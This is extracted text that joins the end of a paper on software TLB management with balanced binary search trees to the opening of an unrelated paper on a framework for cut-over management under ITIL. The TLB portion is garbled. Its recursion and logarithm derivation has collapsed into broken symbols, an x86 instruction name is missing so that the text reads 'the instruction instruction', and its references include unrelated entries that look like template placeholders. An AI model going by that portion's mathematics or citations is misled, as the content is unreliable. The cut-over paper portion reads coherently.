Right tree number 340 1 2 3 4 19 balance 49 Page frame number Figure 3. Item A. Composition The virtual page number marks the page corresponding to the table item, and the significant bit records whether the table entry is used or not, whether the table item has been modified, the read / write and execution permissions of the protection bit record, and the setting of index bit and balance factor bit of the root node of the left and right sub trees are determined by comparing the size of the root node with that of the root node to determine whether the search of the left and right sub trees is recursive . The node stores the index of the left and right child nodes, and then stores the balance factor (the balance factor is only 1,0, -In three cases, if the absolute value exceeds 1, then the balanced binary search tree is judged to be unbalanced). International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 54 When the TLB is full, some page table items need to be eliminated. Therefore, according to the corresponding page replacement algorithm, different flag bits are flexibly set to mark the page table items that should be eliminated; the row significant bit is that when the system starts, each TLB row is empty, and the information in it is invalid In order to show whether the information in the TLB row is valid, each row has a significant bit. By clearing the significant bit of the row, the corresponding page table item is eliminated. Note: setting the global bit in a page directory/table entry will prevent that entry from being flushed. This is useful for pinning interrupt handlers in place. B. Alternate method An alternate method is to use instruction, which should be used instead of the above method when doing small mapping modifications (creation, removing, changing.) instruction is mostly used in page not mapping and remapping routines in order to invalidate a previous cached translation. If instruction or some other TLB flush method had not been used, the mapping would remain cached, producing undefined consequences. However, please note that the instruction instruction was introduced in the i486 ISA and is not part of the i386 ISA, thereby requiring a properly written i386- compatible kernel to use conditional inclusion of relevant code at compilation time depending on the target machine. The above is more complicated in the multiprocessor case. If another processor could also be affected by a page table write (because of shared memory, or multiple threads from the same process), it must also flush the TLB on those processors. This will require some form of inter-processor communication. VI. MATHEMATICAL VERIFICATION Time complexity: the difference between height of the left sub tree and the right sub-tree is no more than 1. Our team assumed that NH is the minimum number of nodes in the balanced binary tree with depth H. From the method of recursion recursion, the result is NH = NH-1 + NH-2 + 1 (1 is the root node), and the minimum search length is deduced. Therefore, the equation can be obtained by the characteristic equation method.  2 = 1 The result is 2 51  Then our team assign the special solution is n = C, replace it into the former formula, and the result is C = - 1, so the general term formula can be obtained. C 1  1 n +C2  2 n -1 Therefore, the equation can be obtained. （1+ 5 2 ） )2 51 (  n + ) 2 51 )( 5 2 1(   n - 1 And then figure the equation n< )1( 2 51 log   N < 2 3 log2 )1( N According to the characteristics of the tree, the maximum depth of the balanced binary tree with n nodes is log2N, and the average search length is log2N approximately. VII. MODERN OPERATING SYSTEM In modern processor, software uses virtual address to access memory, and MMU unit of processor is responsible for converting virtual address to physical address. In order to complete this mapping process, software and hardware jointly maintain a multilevel mapping page table. When the processor finds that the page table cannot be mapped to the corresponding physical address, it will trigger a page missing exception and suspend the error process. The operating system software needs to handle the page missing exception. A. Content TLB is specifically used to cache page table entries in memory, usually inside the MMU unit. TLB is a very small cache, and the number of TLB entries is relatively small. Each TLB entry contains information about a page, such as significant bit, virtual page number, modified bit, physical page frame number, etc. When the processor wants to access a virtual address, it will first query in the TLB.  If there is no corresponding entry in the TLB table entry, it is called TLB miss, then need to access the page table to calculate the corresponding physical address. If there is a corresponding entry in the TLB table entry, the physical address is directly obtained from the TLB table entry, which is called TLB hit. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 55  The basic unit of TLB internal storage is TLB table entries. The larger the TLB capacity, the more TLB entries can be stored, and the higher the TLB hit rate. However, the capacity of TLB is limited. At present, the Linux kernel uses 4KB small pages by default. If a program uses 512 small pages, it needs at least 512 TLB entries to ensure that TLB miss will not occur. However, if a 2MB page is used, only one TLB table entry is needed to ensure that TLB miss will not occur. For large applications that consume memory in gigabytes, large pages in 1GB can also be used to reduce TLB miss.  Because accessing the page table in memory is relatively time-consuming, especially when multilevel page tables are widely used nowadays, multiple memory accesses are required. In order to speed up the access, the system designer has designed a hardware cache TLB for page table. The CPU will first look it up in TLB, because it is very fast to find it in TLB. The reason why TLB is fast is that it contains a small number of entries. On the other hand, TLB is integrated into the CPU. It can run almost at the speed of the CPU. If an entry (TLB hit) containing the virtual address is found in the TLB, the corresponding physical address can be obtained directly from the entry. Otherwise, unfortunately, TLB miss will occur, and the page table of the current process (paging structure caches may be used here). At this time, another part of the MMU, the table walk unit, is called out. The table in the MMU is page table. The method of using table walk unit hardware unit to find page table is called hardware TLB miss handling, which is usually adopted by CISC architecture processor (such as IA-32). It can't be found in page table, and it will be handled by software (operating system) when page fault appears. In contrast, software TLB miss handling, which is usually adopted by RISC architecture processors (such as alpha), does not involve the CPU after TLB miss. The operating system searches the page table through software. The way to use hardware is faster, while the way to use software is more flexible. IA-64 provides a hybrid mode, which can take into account the advantages of both. If the P (present) bit of the entry corresponding to the virtual address is found in the page table, it indicates that the physical page corresponding to the virtual address currently resides in memory, that is, page table hit. There are still two things to do. Since it can't find it in TLB, it's natural to update TLB. Check the permissions, including read / write / executable permissions, user / supervisor mode permissions, etc. If it do not have the correct permissions, SIGSEGV (segmentation fault) will be triggered. If the P bit of entry corresponding to the virtual address is 0, page fault will be triggered. There may be several situations. B. Address The virtual address has never been accessed after it has been allocated (for example, if there is no space allocated after allocation, the physical memory will not be allocated). After the page fault is triggered, the physical memory is allocated, that is, demand paging. After a certain demand is available, the system will allocate the P position to 1. The content of the corresponding physical page is swapped out to the external disk / flash. At this time, the page table entry stores the temporary location of the page in the external swap area. It can switch it back to physical memory, establish the mapping again, and then set P position 1. If the virtual address does not exist in the page table of the process, it means that the virtual address is not in the address space of the process. At this time, segmentation fault will also be triggered. The CPU’s MMU locates the page directory for the process using the special register mentioned above. The page directory index (from the first 10 bits of the virtual address) is used to locate the PDE that identifies the page table needed to map the virtual address to a physical one. The page table index (from the second 10 bits of the virtual address) is used to locate the PTE that maps the physical location of the virtual memory page referenced by the address. The PTE is used to locate the physical page. If the virtual page is mapped to a page that is already in physical memory, the PTE will contain the page frame number (PFN) of the page in physical memory that contains the data in question. (Processors reference memory locations by PFN). International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 56 Figure 4. process C. Steps in TLB hit:  CPU generates virtual address.  It is checked in TLB (present).  Corresponding frame number is retrieved, which  now tells where in the main memory page lies. D. Steps in Page miss:  CPU generates virtual address.  It is checked in TLB (not present).  Now the page number is matched to page table residing in main memory (assuming page table contains all PTE).  Corresponding frame number is retrieved, which now tells where in the main memory page lies.  The TLB is updated with new PTE (if space is not there, one of the replacement technique comes into picture i.e either FIFO, LRU or MFU etc). E. Conclusion Effective memory access time(EMAT) : TLB is used to reduce effective memory access time as it is a high speed associative cache. EMAT = h*(c+m) + (1-h)*(c+2m) Where, h = hit ratio of TLB m = Memory access time c = TLB access time If the page is not in physical memory, the MMU raises a page fault, and the Windows page fault– handling code attempts to locate the page in the system paging file. If the page can be located, it is loaded into physical memory, and the PTE is updated to reflect its location. If it cannot be located and the translation is a user mode translation, an access violation occurs because the virtual address references an invalid physical address. If the page cannot be located and the translation is occurring in kernel mode, a bug check(also called a blue screen) occurs. Figure 5. mapping relation VIII. CONCLUSION According to the characteristics of the tree, the maximum depth of balanced binary tree with n nodes is log2N, and the average search length is approximately log2N. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 57 In this paper, our team discuss the software TLB management method based on balanced binary search tree through the abstract model. This management method takes advantage of the advantages of balanced binary search tree in pruning and searching, which can quickly complete the retrieval of virtual page number and physical page . When the TLB expands, the number of TLB failures decreases, and the cost of tree building is shared equally in each search. To a certain extent, it can improve the performance of computer operating system in processing large virtual memory space, accelerate the conversion from virtual address to physical address, and make room for other designs on chip. However, due to the lack of experimental environment and sufficient theoretical knowledge, our team only verify theoretical time compleity by math and statistic, did not test in the actual environment, especially not verify the program model ,which is based on balanced binary search tree, our team did not test reliability under the condition of hardware instability or storage space disorder, like no electrical power and other special circumstances. A reliable software model which can be used in engineering must consider all kinds of special circumstances. Stability and reliability is the most important aspect of a software model. Balanced binary search tree as the search scheme of this model has the possibility of further optimization. The algorithm designed in the future research should not only consider the running speed, but also consider the difficulty of implementation in practical engineering and the future maintenance work. It is necessary to do further study of complexity of maintenance work and the stability of the software model. Engineering and theory are the unity of opposites. Theory is the source of engineering. The development of theory needs the support of engineering. REFERENCES [1] Marin G, Mellorcrummey J. Cross-architecture performance predictions for scientific applications using parameterized models[C]. measurement and modeling of computer systems, 2004, 32(1): 2-13. [2] Boncz P, Manegold S, Kersten M L, et al. Database Architecture Optimized for the New Bottleneck: Memory Access[C]. very large data bases, 1999: 54-65. [3] G.M.Adelson-Velsky,E.M.Landis, “An algorithm for the organization of information” 1962 30(1): 7-13 [4] Deb, Kalyanmoy, and Ram Bhushan Agrawal. "Simulated Binary Crossover for Continuous Search Space.." Complex Systems 1995. [5] I. S. Jacobs and C. P. Bean, “Fine particles, thin films and exchange anisotropy,” in Magnetism, vol. III, G. T. Rado and H. Suhl, Eds. New York: Academic, 1963, pp. 271–350. [6] M. Young, The Technical Writer’s Handbook. Mill Valley, CA: University Science, 1989. [7] Talluri M, Hill M D. Surpassing the TLB performance of superpages with less operating system support[C]. architectural support for programming languages and operating systems, 1994, 29(11): 171- 182. [8] Sleator, Daniel D., and Robert E. Tarjan. "Self-adjusting binary search trees." Journal of the ACM 32.3 1985 [9] Rajwar R, Herlihy M, Lai K K, et al. Virtualizing Transactional Memory[C]. international symposium on computer architecture, 2005, 33(2): 494-505. [10] Menon A, Santos J R, Turner Y, et al. Diagnosing performance overheads in the xen virtual machine environment[C]. virtual execution environments, 2005: 13-23. work_wsiwqbod3nbyvm3dffvduzocri ---- A framework for cut-over management Submitted 13 August 2015 Accepted 15 October 2015 Published 4 November 2015 Corresponding author Guido Nageldinger, guido.nageldinger@ottogroup.com Academic editor Letha Etzkorn Additional Information and Declarations can be found on page 29 DOI 10.7717/peerj-cs.29 Copyright 2015 Nageldinger Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS A framework for cut-over management Guido Nageldinger Department of Testing and Release Management, Otto (GmbH & Co KG)—A member of the otto group, Hamburg, Germany ABSTRACT The purpose of this paper is to provide a governance structure for IT-related projects in order to assure a safeguarded and timely transition to a productive environment. This transitioning, which rarely exceeds a weekend, is colloquially called ‘cut-over’, ‘rollout’ or ‘deployment’. The governance structure is defined in accordance with a set of project-specific deliverables for a cascade-type procedural project-management model, which is integrated within an Information Technology Infrastructure Library (ITIL)-orientated service organization. This integration is illustrated by the use of a semi-agile release model. Due to the release model selected, which is particularly characterized by its bundling of projects for a release-specific rollout (as it is referred to in the project documentation), a new definition and interpretation of deployment from a generic ITIL perspective is required. The facilitated release model requires a distinction between a project-specific cut-over and a release-specific rollout. This separation gives rise to two types of go-live scenarios: one for each participating project and one for each release. Additionally, an interplay between cut-over planning for a project and rollout planning for a release becomes apparent. Projects should already incorporate cut-over related deliverables in the initial planning phase. Even though consulting methodologies such as ASAP (Accelerated SAP), recommend scattered, project-specific deliverables useful for cut-over planning, this publication offers an integrated approach on how to prepare systematically for a project-specific cut-over with all required deliverables. The framework provided maps out ITIL’s release and deployment process by means of IT projects; furthermore it allows IT projects to interface easily with the ITIL change-management process. Subjects Computer Architecture, Theory and Formal Methods, Software Engineering Keywords Release, Project-specific cut-over, Release-specific rollout, Go-live preparation, Go-live, Deployment, Application-specific cut-over, ITIL, IT Service Management, IT Project Management INTRODUCTION Most IT-related projects, in particular implementation and software development projects, change a productive system landscape when taken live. On the one hand these projects face the challenge of delivering a change (within an ITIL context) in a timely and cost-effective manner. On the other hand, IT organizations need to assure the integrity of the system landscape and are required to minimize potential interference to the ongoing business, as Service Level Agreements (SLAs) need to be fulfilled. The Central Computing and Telecommunications Agency (CCTA), a government agency in Great Britain, already developed the Information Technology Infrastructure How to cite this article Nageldinger (2015), A framework for cut-over management. PeerJ Comput. Sci. 1:e29; DOI 10.7717/peerj-cs.29 mailto:guido.nageldinger@ottogroup.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.29 http://dx.doi.org/10.7717/peerj-cs.29 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.29 Library (ITIL) at the end of the 1980s. The latest update of ITIL V3 was published in 2011 which is frequently referenced as ITIL 2011. Is it still relevant? Yes, because it helps bring order to IT chaos. Proehl et al. (2013) analyzed 255 articles in the field of IT Service Management. They also confirmed the work by Shahsavarani & Ji (2011). Both studies found a growing number of published papers dealing with the development of concepts, constructs, models, methods and implementations for theory development. Performance issues in IT Service Management, justifications, and IT Infrastructure Library topics are among the most popular topics of research. Only a few articles have used or developed theories. Marrone et al. (2014) found organizations adopting ITIL implemented more operational level processes than the tactical/strategic level processes. The study utilizes 623 survey responses from the UK, USA, DACH (German-speaking countries) and Australia. ITIL is rarely seen in isolation and current research focuses on the integration with IT governance standards, such as ISO/IEC 38500 and other methodologies, such as COBIT, PRINCE2 and the ISO2700x-family (Tanovic & Orucevic , 2012; Shivashankarappa et al., 2012; Jäntti et al., 2014; Larsson, Rusu & Aasi, 2015). ITIL’s release and deployment management processes are demanding. Jokela & Jäntti (2012) as well as Lahtela & Jaentti (2011) identified within their case studies the following common challenges: • no existing process for product portfolio release and deployment management • lack of communication • unclear release and deployment management and/or product portfolio management process roles • lack of resources and time for product portfolio integration, testing and reviewing • existing models and practices are not suitable for agile software development • uncertainty about of the contents of release packages • high release distribution frequency • different and tailored release packages • the change management is not up to date and • no existing service catalog. The project-specific cut-over, as defined in more detail below, requires detailed planning, many meetings and several agreements with all stakeholders involved. Which questions need to be addressed? Here are just some of them: • How should the project outcomes be transferred to operation? • Which scenario provides the best compromise between time, cost and risk? • What happens if the cut-over fails? • How can the previous system condition or version be reinstalled in case cut-over fails? • How can we ensure that projects start early enough, with all the necessary preparation work? Nageldinger (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.29 2/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.29 • How can cut-over activities be aligned within an IT service organization? • How do we measure the success of the cut-over–and how can we maximise it? Unfortunately, answers and activities associated with these cut-over related topics are frequently addressed too late, probably because the cut-over is one of the final steps in projects and can therefore be hidden for a long time. If a cut-over and its associated deliverables are not integrated within the overall Project Plan then projects are at risk of being delivered too late. For this reason, there is an urgent business need to govern projects in such a manner that they do not forget to cover cut-over related items. So, which items should projects cover? This question and many others are addressed by a ‘framework for deployment management’ as referred to below in this document. The purpose of this paper is to provide a methodology which assures a robust and timely go-live for projects. An itemised objective overview: • to list the key deliverables projects need to provide in order to assure a timely and safe go-live • to illustrate how these deliverables can be integrated within the ITIL release and deployment process • to look into different deployment types, which this paper refers to as (a) project-specific cut-over, (b) application-specific cut-over and (c) release-specific rollout along with the timeframes and timepoints involved, and lastly • to present a framework which enables an IT-service organization to transition a project to a productive environment. The scope of the deployment framework introduced is required • to be applicable within an Information Technology Infrastructure Library (ITIL)- orientated service organization, and • to extend commonly facilitated project-management methodologies. As with most management practices, there are always more ways to achieve similar results with other approaches. However, in order to examine and establish good management practice, these methodologies need to be published to facilitate comparison. The framework published here is just one of many potential options. It illustrates how deployment activities can be harmonised with commonly facilitated IT projects as well as quality-management practices, and integrated in an ITIL environment. Even though it is possible to take advantage of the deployment framework presented here without ITIL, many companies have adopted ITIL recommendations and best practices and are organized in a service-orientated manner. IT projects are therefore unlikely to exist in isolation and are more likely to be embedded in a service-orientated manner. ITIL is known to be generic and by itself is not complete. Its purpose is not to provide advice on how to implement IT Service Management processes. Instead it requires integration with other disciplines such as project management and quality management. Nageldinger (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.29 3/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.29 The framework presented here in the form of an illustrative case study arose during my consultancy work and has been implemented for some applications within the Department of Testing and Release Management of Otto (GmbH & Co KG) which is a member of the otto group. It is not a hypothetical model. Projects which wish to cut-over in form of a release-specific rollout are requested to comply with this framework. Within every release between 15 to 25 projects are participating. Six release-specific rollouts are conducted every year. Even though consulting methodologies such as ASAP (Accelerated SAP) recommend scattered project-specific deliverables useful for Cut-over Planning, this publication offers an integrated approach on how to systematically prepare for a project-specific cut-over with all required deliverables. The framework provided extends the ITIL release and deployment process by means of IT projects and allows IT projects to interface easily with the ITIL change-management process. The activities of the otto group, with its headquarters located in Hamburg, Germany, are grouped into three main business areas: (i) Multichannel Retail, (ii) Financial Services and (iii) Service. This structure is consistently reflected in the group’s activities along the retail value chain, in Logistics for instance. In the year 2014/15, the Group generated consolidated revenue of more than 12 billion euros and employed about 54,000 staff worldwide. PROJECT-SPECIFIC CUT-OVER VERSUS RELEASE- SPECIFIC ROLLOUT ITIL is often facilitated as a checklist. With regard to the release and deployment process, it consists of the following steps (Rance, 2011): • plan and prepare a release • build and test a release • plan and prepare deployment • conduct deployment • conduct review, and • provide early-life support. Due to its generic nature and the need to interface with other disciplines, IT-service organizations implement these steps quite differently. The variability of implementation options may be caused by different interpretations of the term ‘release’, which is also related to the term ‘change’. How does ITIL define these terms? The term ‘release’ is defined as: “One or more changes to an IT service that are built, tested and deployed together. A single release may include changes to hardware, software, documentation, processes and other components.” (AXELOS, 2011). The term ‘change’ is defined as: “The addition, modification or removal of anything that could have an effect on IT services. The scope should include changes to all architectures, processes, tools, metrics and documentation, as well as changes to IT services and other configuration items.” (AXELOS, 2011). Nageldinger (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.29 4/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.29 Figure 1 Example of a semi-agile release model. Example of a semi-agile release model with its project and rollout view and relation to ITIL’s Application Management, Problem & Incident Management as well as Change Management. In order to safeguard the related system landscape as well as associated services, conventions need to be outlined on the practical arrangement and organization of release-related changes. Here, the term ‘release-model’ is facilitated for a set of rules and conventions used to bundle and organize a release. Figure 1 illustrates a semi-agile release model, which is used within this publication as an example to address some dependencies (Nageldinger, 2015). This release model is called ‘semi-agile’ here because it consists of an agile section and a release phase, which follows a classical sequential pattern (cascade model). During the agile period, phases between projects are non-clocked. Project phases which fall within the agile period relate to the Project Planning, design and realization section, and can be conducted in sprints. Once these projects participate in an integration test, then their phases need to be clocked. Independently of which release model is facilitated, the release phase will most likely consist of (i) an entry gate, (ii) technical and business-related integration tests with their acceptance procedures, and (iii) the release-specific rollout (see Fig. 2). Let us now look at the deployment types. In case the bundling of projects is foreseen by the release model, such as in the one presented here, then we encounter deployment related to the release as well as deployment related to participating projects. ITIL does not distinguish between these. Here, the term ‘deployment’ (AXELOS, 2011) is defined as “an activity responsible for movement of new or changed hardware, software, documentation, process etc. to the live environment. Deployment is part of the release and deployment management process.” It can probably be argued that such a distinction is unnecessary, since all bundled projects are to be deployed in the same time slot. However, the project-specific deployment and its associated preparation work are owned by the Nageldinger (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.29 5/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.29 Figure 2 Release phase and rollout window. Illustration of the release phase and the positioning of the rollout window. Project Manager and, in the case of larger projects, by a designated Cut-over Manager. According to ITIL the Release and Deployment Manager owns the release and its associated deployment. ITIL’s definition of ‘deployment’ lacks conceptual clarity. This is because if we look only at the movement of software to the live environment then we also need to distinguish between the actual movement and its use when the software is ‘switched on’. This is necessary if legal changes come into effect at a specific point in time, for example, but the software is required to be moved to the live environment beforehand. For the purposes of this paper the term ‘deployment’ from now on is solely used to refer to the movement of software to the live environment, which is commonly conducted within a restricted timeframe. The term ‘point-of-use’ is facilitated to account for the point in time in which the software is ‘switched on’. In order to safeguard our system landscape and associated services we need to monitor both the deployment (timeframe) and point(s)-of-use (point in time). In the context of a release, one deployment and potentially more points-of-use are scheduled. This aspect is elaborated further below in the discussion of the release-change. Besides the participating projects, a release additionally includes service packs (a phrase used for minor upgrades), bug fixes and smaller system-related features. These non-project elements are usually governed by separate changes. All ingredients of a release should provide the option of independent transitioning to the productive environment. If this option is not provided, then projects or non-project elements cannot easily be excluded from the release if they fail the integration test. Smaller projects are likely to be bundled in form of a release, and then transitioned to a productive environment in form of a release-specific rollout. Major IT implementation projects are preferably transitioned to a productive environment independently, in order to reduce complexity. Nageldinger (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.29 6/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.29 The term ‘project-specific cut-over’ defines the transition of a project to a productive environment. It relates to the project as a whole and includes the software deployment and its point of use. The actual timeframe associated with the project-specific cut-over is called the ‘cut-over window’. The ‘release-specific rollout’ defines the collective transition of bundled projects to a productive environment. In the same way, the associated timeframe is called the ‘Rollout Window’ (Nageldinger, 2014). Frequently, projects communicate what is frequently called a ‘go-live date’ on their overall project chart. In view of the reasons given above, this could mean (i) end of the software deployment, (ii) end of cut-over window, which relates to the transitioning of the whole project, or (iii) point-of-use. It is therefore recommended to question what exactly this date refers to. Beside the project-specific cut-over and the release-specific rollout we are most likely to face a third transitioning aspect, here called the ‘application-specific cut-over’: this relates to a specific system or application and mainly covers approaches related to maintenance or upgrades. It differs from the project-specific cut-over in that it consists of canonical (i.e., reoccurring with every rollout) activities and tasks. The deployment of service packs can be organized canonically, for example. Within an SAP context the term ‘rollout’ is frequently associated with a so-called ‘template approach’. In this, the core configuration is embedded within a reusable template and the country-specific characteristics are added separately in the form of a local configuration (SAP, 2009). SAP’s usage of the term ‘rollout’ is quite similar to the definition provided here and its associated release context. This is because the release-specific rollout also consists of reoccurring activities, here referred to as “application-specific cut-over”, which is similar to SAP’s template approach. The project-specific cut-over activities, which are non-reoccurring, may be considered in the same way as SAP’s country-specific characteristics. The Cut-over Schedule is a list of tasks and activities required in order to conduct the cut-over. It differs from the ordinary overall project schedule as it only focuses on tasks and activities within the cut-over window, of short duration and lasting only for a couple of hours or a weekend. The Cut-over Schedule is created by duration-based scheduling techniques. Additionally, it contains a list of prerequisites, such as the delivery of training courses and the installation of printers etc. These prerequisites need to be completed before the actual cut-over can be conducted and are part of the overall project schedule. The Cut-over Schedule does not relate to the post go-live phase. For this objective projects need to have a separate plan, which for example addresses aspects of support, data-conservation and accounting closure procedures. Besides the Cut-over Schedule the Cut-over Plan contains a variety of other deliverables, in the same way as a project-management plan, which are further elaborated below. Key elements of a Cut-over Schedule are for example termination points, frequently called ‘points-of-return’ (POR). Theses PORs aim to trigger activities used (i) to restore the initial condition or (ii) incrementally fall back to a previous POR. The last POR is referred to as the ‘point-of-no-return’ (PONR). The PONR does not always fall within the cut-over Nageldinger (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.29 7/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.29 Figure 3 Visualization of the cut-over window. window. The Fallback Concept is the name of a document used to describe activities which are potentially necessary at these PORs, in case the system needs to be rolled back to a previous state or even its initial state. If the cut-over activities pass the PONR then we enter the disaster scenario. For such events, a disaster-recovery concept defining appropriate measures should be in place. The disaster-recovery concept is mentioned here because it is unfortunately frequently neglected. It is regularly associated with earthquakes, hurricanes or terrorist attacks. However, unforeseen events during a cut-over after the PONR can also trigger the disaster scenario (BSI, 2008). The cut-over window is illustrated in Fig. 3. The sections above clarify why certain release-models, which foresee the bundling of projects for collective rollout, require at least two perspectives—a project-specific and a release-specific one. An important outcome for the preparation of a project-specific cut-over and a release-specific rollout is the go-live scenario. A go-live scenario defines the overall approach on how a cut-over or rollout is to be conducted. The go-live scenarios differ in most cases, which is illustrated by an example in Fig. 4. The go-live scenario of project A utilizes the Rollout Window of release 1 and 2, whereas projects B and C merely take advantage of one Rollout Window. The release-specific rollout also facilitates go-live scenarios. Here, the rollout of release 1 uses a sequential rollout strategy, while the rollout of release 2 uses a parallel rollout strategy. RECOMMENDED DELIVERABLES AND OUTCOMES FOR THE PREPARATION OF A PROJECT-SPECIFIC CUT-OVER This chapter covers recommended deliverables and outcomes for projects in order to prepare for a project specific cut-over. Projects are assumed to be arranged in a cascading manner with classic phases, in order to keep this publication as simple as possible. However, as stated above, activities may be undertaken in an agile manner before entering the release phase. Nageldinger (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.29 8/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.29 Figure 4 Illustration of two release-specific rollouts. The Go-live Strategy of project A utilizes the Rollout Window of release 1 and 2, whereas projects B and C facilitate only one Rollout Window. In the same way as the project’s Go-live Strategy, the release-specific rollout uses a Go-live Strategy for the release. In this illustration, the rollout of release 1 utilizes a sequential rollout strategy and the rollout of release 2 a parallel rollout strategy. The release model presented in Fig. 1 illustrates the following generic phases, which are quite similar in the case of IT-related projects: • Project-planning phase • Design phase • Realization phase • Test phase • Cut-over phase • Support phase. Quality Management is facilitated in order to request these cut-over relevant project deliverables, which are then reviewed by Rollout Management. Table 1 illustrates potential deliverables (Nageldinger, 2015). Some of them are mandatory, others are optional. These deliverables are further elaborated here below and presented according to their project phases. Nageldinger (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.29 9/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.29 Table 1 Project-specific deliverables for cut-over planning. Bold font used for deliverables related to Rollout Management; italic font used for optional deliverables which are not evaluated by Quality Management; normal font used for mandatory deliverables. Project planning Design Realization Test Cut-over Support Plan for Deployment Management System-profile description Decision model presentation for the Go-live & Fallback Strategy FINAL Cut-over Plan Operational Cut-over Observation of incidents Establish Cut-over Manager (COM) position System landscape design (SLDe) Decision related to the Go-live & Fallback Strategy Fallback concept Lessons learned Initial dialogue with Rollout Management Extension to SLDe due to Go-live Strategy One-Pager Disaster- recovery concept Go-live strategy DRAFT Cut-over Plan Plan for the deploy- ment of personnel Fallback Strategy Risk Register Cut-over test Framework for cut-over planning Dependency Matrix Go-live simulation Stakeholder analysis Dialogue with Rollout Management Kick-off Communication Plan Completely defined Cut-over Team Table 2 Activity types used for a Rollout/Cut-over Schedule. Ordinary activities are not assigned an activity type. Activity type Explanation Info Someone needs to be informed, usually by e-mail. Checkpoint Technical verification point within cut-over/rollout flow. Optional Activity is conducted only for certain rollouts; if the activity is not required then the time is set to 0. Security Security-related activity, such as back-up or the implementation of restore points. Handover Handover of a certain document, protocol etc. Unique Non-recurring activity within the rollout flow; commonly relates to a project and is therefore not facilitated for other rollouts. Breakpoints Breakpoints are used during task or process chains in order to verify intermediate results. This activity type relates to these breakpoints. Comment Project-planning tools often provide limited functionality related to comments within the working breakdown structure (WBS). Comments are activities with time = 0 and are merely used to provide additional information within the WBS. Project-planning phase The preparation of a project-specific cut-over already needs to be considered during the planning phase of a project. Key deliverables are (i) a decision related to the establishment of a Cut-over Manager position, (ii) an agreement on cut-over specific deliverables, which are included (iii) within a plan for Deployment Management. Nageldinger (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.29 10/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.29 Plan for Deployment Management In order to deliver a Cut-over Plan on time it is important that the cut-over related deliverables and outcomes are already taken into consideration during the planning phase of a project. Larger projects will probably require a separate schedule for all cut-over related planning tasks and activities, whereas smaller projects include them in their overall project schedule. Here, this key deliverable is called deployment management plan. Please note that these tasks relate solely to the necessary preparation and planning work and not to the Cut-over Schedule itself. Establish Cut-over Manager (COM) position During the planning phase it needs to be decided whether a Cut-over Manager (COM) position is to be implemented. The COM role may be compared with the role of a Project Manager; it is solely an administrative role which covers IT-related topics as well as business related ones. The only difference is that the COM focuses on the preparation work associated with activities conducted within the cut-over window. A COM is responsible for the preparation, planning and execution of the project-specific cut-over. He or she needs to be positioned beside the Project Manager and should be part of the Steering Committee. This is because conflicts of interest are likely to occur between the COM and the Project Manager. Additionally, a COM needs to drive decisions and potential change-requests related to the cut-over; many of these bear associated risks. A common role for a COM would include the following responsibilities: • drive a decision on the final go-live strategy • implementation and guidance of a Cut-over Team • creation of a Cut-over Plan • creation of a list with initial conditions required to be met prior to the cut-over • initiating a list of activities after cut-over • planning, execution and organization of the cut-over-test and go-live-simulation. Smaller projects do not usually need a COM as the Project Manager fulfils this role. Initial dialogue with Rollout Management During the project-planning phase an initial dialogue with Rollout Management is mandatory because related deliverables need to be scaled to the project size. This scaling is quite difficult to automate since it depends on experience and the potential interfaces involved. A simple formula, for example based on the project budget, is insufficient. Design phase Prior to completion of the design phase, the Go-live Strategy and Fallback Strategy should be finalized. Depending on the project size, these key deliverables can be combined and should provide a top-level description of options on how to transition the project to a productive environment, as well as how the initial state can be restored. Nageldinger (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.29 11/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.29 Go-live strategy The Go-live Strategy is of an investigative nature. It should provide several potential go-live options with their associated impacts, rather than an ultimate solution. It should foster discussions related to the topic. The idea is to provide a general overview and associated opinions. This document is later used to balance stakeholder interests and to carve out the final go-live method. A Go-live Strategy starts with the go-live scope. How does the go-live scope differ from the project scope? Practically speaking, the go-live scope is the elaborated version of the initial project scope and it is therefore more concrete. The project scope, for example, can state the introduction of a system to meet the purpose XYZ. A go-live scope needs to state precisely which system is going to be implemented, lists the technology involved and states the required organizational changes. A project scope, for example, can state the improvement of a process. The go-live scope needs to state how a particular process is to be improved and which changes are required to be conducted. It is recommended to define the go-live scope in writing during a workshop attended by all project key players. This exercise is valuable for the overall project, as well as in identifying scope changes already occurring. A properly defined go-live scope is a prerequisite for evaluating all other cut-over relevant questions. The Go-live Strategy covers the following aspects: • a description on how the project can be transitioned to the live environment. The description can be of generic nature and should relate to the major approaches, such as big-bang, phased go-live, or iterative methods. • It is highly recommended to provide several go-live options which identify and provide for the various associated risks. • Many go-live scenarios potentially impact the business and technical infrastructure. The impact and its potential consequences should be discussed with the stakeholders. Their opinion should be included within the Go-live Strategy and referenced as well. • Alternative go-live approaches, which are probably not investigated further, should be defined and recorded. Additionally, it should be recorded why particular options are not followed up. • One section should focus on potential go-live dates. Again, rather than providing one ideal date, several potential dates should be evaluated. What are the benefits and catches of these dates? Which dates could be used as an 